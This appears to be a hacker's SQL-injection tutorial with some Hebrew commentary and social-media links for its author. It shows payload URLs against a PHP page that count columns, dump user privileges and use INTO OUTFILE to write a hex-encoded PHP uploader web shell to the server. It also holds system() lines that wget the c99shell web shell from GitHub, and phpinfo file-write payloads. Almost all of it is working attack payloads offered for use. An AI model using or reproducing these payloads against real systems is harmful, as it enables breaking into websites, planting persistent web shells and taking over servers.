Upload Shell Throug Sql Query By zureal_sTz

1. <===============Hacker zurael sTz===============>
2. =================twitter=============================
3. https://twitter.com/zurael_stz
4. =================facebook============================
5. https://www.facebook.com/sTzisrael/
6. =====================================================
7. =================telegram============================
8. https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
9. =====================================================
10. <===============Hacker zurael sTz===============>
11.  
12. Upload Shell Throug Sql Query By zureal_sTz
13.  
14.  
15. http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=79 ' : error sql
16.  
17.  
18. ORDER BY
19.  
20.  
21. http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=79 order by 10-- : Unknown column '10' in 'order clause'Query Fail
22. http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=79 order by 9-- : Unknown column '9' in 'order clause'Query Fail
23. http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=79 order by 8-- : new error
24.  
25.  
26.  
27. http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=-79 union select 1,2,3,4,5,6,7,8--
28.  
29. עכשיו נבדוק א מקבלים תשובה מהשרת
30.  
31. http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=-79 union select 1,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),3,4,5,6,7,8--
32.  
33. וכן קיבלנו תשובה מהשרת
34.  
35. YES
36. ,'root'@'localhost' -> YES
37. ,'root'@'localhost' -> YES
38. ,'root'@'localhost' -> YES
39. ,'root'@'localhost' -> YES
40. ,'root'@'localhost' -> YES
41. ,'root'@'localhost' -> YES
42. ,'root'@'localhost' -> YES
43. ,'root'@'localhost' -> YES
44. ,'root'@'localhost' -> YES
45. ,'root'@'localhost' -> YES
46. ,'root'@'localhost' -> YES
47.  
48. עכשיו לאתר קובץ
49.  
50. זאת השגיאה
51. F:\Lexus\indexPage\IndexOther.php
52.  
53. נעשה ככה
54. F:/Lexus/indexPage/name.txt
55. F:/Lexus/indexPage/name.php
56.  
57.  
58.  
59.  
60. http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=-79 union select 1,0x3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e,3,4,5,6,7,8 INTO OUTFILE "F:/Lexus/indexPage/name.php"--
61.  
62.  
63. <?system ('wget https://raw.githubusercontent.com/tennc/webshell/master/php/PHPshell/c99shell/c99shell.php -o script.php');?>
64. "><? system ('wget https://raw.githubusercontent.com/tennc/webshell/master/php/PHPshell/c99shell/c99shell.php -O script.php');?>
65.  
66. id=ddos) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>’ into outfile ‘/var/www/html/bWAPP/image/phpinfo.php’%23
67. id=ddos) into outfile ‘/var/www/html/bWAPP/image/phpinfo’ fields terminated by ‘<? phpinfo(); ?>’%23
68.  
69. #zurael_sTz